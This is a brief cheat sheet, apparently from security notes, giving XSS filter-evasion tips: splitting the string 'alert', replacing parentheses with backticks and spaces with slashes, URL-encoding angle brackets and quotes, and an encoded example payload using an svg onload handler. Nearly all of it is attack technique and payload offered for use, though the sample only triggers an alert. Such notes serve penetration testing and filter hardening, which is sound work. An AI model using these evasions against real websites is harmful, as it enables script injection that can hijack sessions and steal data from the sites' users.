Basic XSS Encoding Tips

Basic XSS Encoding Tips ⏬

  1. alert = window["al"+"ert"]

  2. bypass () with ``

  3. replace space with /

  4. encode symbols:

< = %3c
> = %3e
" = %22
[ = %5b
] = %5d
` = %60

Example Payload: %3csvg/onload=window%5b"al"+"ert"%5d1337%3e

Last updated